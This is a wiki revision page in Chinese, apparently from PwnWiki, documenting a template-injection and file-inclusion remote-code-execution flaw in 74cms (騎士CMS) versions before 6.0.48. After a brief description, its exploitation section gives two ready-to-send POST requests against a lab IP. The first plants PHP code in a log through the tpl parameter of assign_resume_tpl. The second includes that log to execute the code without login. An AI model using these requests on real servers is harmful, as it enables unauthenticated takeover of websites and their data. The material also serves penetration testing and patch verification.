Difference between revisions of "騎士CMS模版註入 &文件包含getshell漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞描述== </translate> <translate> 騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞描述== | + | ==漏洞描述== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。 | 騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。 | ||
| + | <!--T:3--> | ||
騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。 | 騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==影響範圍== | + | ==影響範圍== <!--T:4--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
騎士 CMS < 6.0.48 | 騎士 CMS < 6.0.48 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:6--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:7--> | ||
使用火狐hackbar發送POST: | 使用火狐hackbar發送POST: | ||
</translate> | </translate> | ||
| Line 33: | Line 37: | ||
<translate> | <translate> | ||
| + | <!--T:8--> | ||
可以看到日誌記錄。 | 可以看到日誌記錄。 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:9--> | ||
包含這條日誌,注意路徑和日誌名稱: | 包含這條日誌,注意路徑和日誌名稱: | ||
</translate> | </translate> | ||
Latest revision as of 14:53, 25 June 2021
漏洞描述
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。
騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
影響範圍
騎士 CMS < 6.0.48
漏洞利用
使用火狐hackbar發送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
可以看到日誌記錄。
包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log